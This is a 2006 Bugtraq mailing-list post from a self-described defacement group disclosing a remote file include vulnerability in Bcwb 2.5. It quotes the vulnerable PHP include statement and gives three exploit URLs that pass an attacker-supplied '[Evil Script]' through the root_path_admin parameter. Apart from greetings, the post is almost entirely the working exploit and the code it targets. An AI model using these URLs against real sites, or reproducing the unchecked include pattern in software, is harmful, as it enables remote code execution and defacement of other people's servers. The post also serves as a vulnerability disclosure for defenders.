[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple Remote File Include
From: firewall1954 () hotmail ! com
Date: 2006-10-30 17:55:25
Message-ID: 20061030175525.17111.qmail () securityfocus ! com
[Download RAW message or body]
####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall
# Application Affect:
Bcwb 2.5
# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download
# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) \
die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');
# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil \
Script]
http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script] \
# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.
####################### Firewall #########################
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic